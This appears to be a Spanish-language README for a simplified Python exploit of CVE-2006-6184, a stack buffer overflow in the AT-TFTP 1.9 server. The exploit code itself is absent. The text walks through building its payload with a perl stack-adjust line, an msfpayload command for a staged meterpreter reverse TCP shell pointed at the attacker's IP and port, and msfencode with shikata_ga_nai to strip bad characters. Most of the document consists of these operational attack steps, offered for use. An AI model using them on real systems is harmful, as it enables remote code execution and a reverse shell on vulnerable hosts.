
versión simplificada de https://github.com/shauntdergrigorian/cve-2006-6184
Este es un exploit independiente basado en Python para CVE-2006-6184. Este exploit desencadena un desbordamiento de búfer basado en pila en Allied Telesyn TFTP Server (AT-TFTP) 1.9, y posiblemente versiones anteriores, lo que permite a atacantes remotos provocar una denegación de servicio o ejecutar código arbitrario.
¿No pensaste que sería tan fácil, verdad? El payload debe personalizarse para incluir tu propia dirección IP y puerto de escucha, así que tendrás que generarlo tú mismo. Para hacerlo, sigue los siguientes pasos:
1.) Introduce lo siguiente para crear un archivo hex de la cantidad que debe restarse del puntero de pila (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) A continuación, usa el siguiente comando para crear un payload de shell meterpreter por etapas:
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[tu IP] LPORT=[tu puerto] R > payload
3.) Luego, combina los dos archivos que acabas de crear.
cat stackadj payload > shellcode
4.) Por último, eliminemos los caracteres malos.
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
Introduce la salida como valor de la variable "payload".